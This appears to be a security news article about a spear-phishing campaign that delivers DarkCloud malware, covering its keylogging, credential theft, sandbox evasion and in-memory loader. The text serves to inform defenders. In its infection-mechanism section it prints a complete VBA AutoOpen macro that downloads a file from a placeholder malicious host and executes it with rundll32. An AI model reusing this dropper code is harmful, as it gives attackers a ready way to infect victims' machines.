A newly observed spear-phishing campaign is leveraging sophisticated social engineering lures to distribute DarkCloud, a modular malware suite designed to harvest keystrokes, exfiltrate FTP credentials and gather system information.
Over the past month, targeted emails masquerading as legitimate software updates or corporate invoices have reached unsuspecting recipients across various industries.
These messages carry a weaponized Microsoft Word attachment that, when opened, triggers a multi-stage infection chain.
Initial reconnaissance indicates that threat actors behind the campaign have invested considerable effort into crafting believable messages, demonstrating a high level of operational security and tradecraft.
Shortly after the victim enables macros in the document, a hidden Visual Basic for Applications (VBA) script executes, reaching out to a command-and-control (C2) server to download the next-stage payload.
.webp)
This payload, the DarkCloud loader, is capable of unpacking additional modules directly into memory, evading disk-based detection and complicating forensic analysis.
Analysts note that the loader checks for virtual machine artifacts and sandboxing environments, delaying execution or aborting if analysis tools are detected.
eSentire researchers identified DarkCloud’s core keylogging component within hours of the campaign’s initial detection.
They observed the malware injecting a dynamic-link library into common processes such as explorer.exe and svchost.exe, establishing hooks on keystroke APIs to capture user input.
This approach ensures that every typed character—including credentials entered into web-based FTP clients—can be intercepted.
The harvested data is then encrypted with a custom XOR-based algorithm and sent to the C2 infrastructure under the guise of legitimate HTTPS traffic, blending in with normal network flows.
.webp)
Aside from credential theft, DarkCloud exhibits advanced reconnaissance capabilities. It gathers system information—such as running processes, installed software, and open network connections—and transmits this metadata back to the attackers.
This enrichment allows the operators to tailor subsequent modules, such as a remote file exfiltration plugin or a screen-capture component, to the victim’s environment.
Throughout the campaign, the threat actors pivot between modules to maximize data collection while minimizing forensic footprints.
Infection Mechanism and Loader Dynamics
The infection sequence begins with a lure document containing an obfuscated VBA macro. Upon activation, the macro executes the following sequence:-
Sub AutoOpen()
Dim xmlHttp As Object
Set xmlHttp = CreateObject("MSXML2.XMLHTTP")
xmlHttp.Open "GET", "https://malicious.example.com/loader.bin", False
xmlHttp.send
Dim shell As Object
Set shell = CreateObject("WScript.Shell")
Dim tempPath As String
tempPath = Environ("TEMP") & "dcl.dll"
With CreateObject("ADODB.Stream")
.Type = 1
.Open
.Write xmlHttp.responseBody
.SaveToFile tempPath, 2
.Close
End With
shell.Run "rundll32.exe " & tempPath & ",EntryPoint"
End SubOnce dcl.dll is loaded, it unpacks additional modules in memory. The loader uses a custom “chunked XOR” routine to decrypt embedded payloads, avoiding dropping executables on disk.
This memory-resident design allows DarkCloud to maintain persistence via a registry run key, while its modular architecture supports on-demand deployment of new capabilities.
By combining a convincing spear-phishing vector with a stealthy, in-memory loader and modular plugins, DarkCloud poses a significant threat to organizations that rely on FTP-based file transfers and unified endpoint protection solutions.
Security teams should monitor abnormal HTTPS sessions to unknown hosts and employ behavioral analysis tools capable of detecting API hook injections. Continuous threat intelligence sharing and rapid incident response will be critical to mitigating DarkCloud’s evolving tactics.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
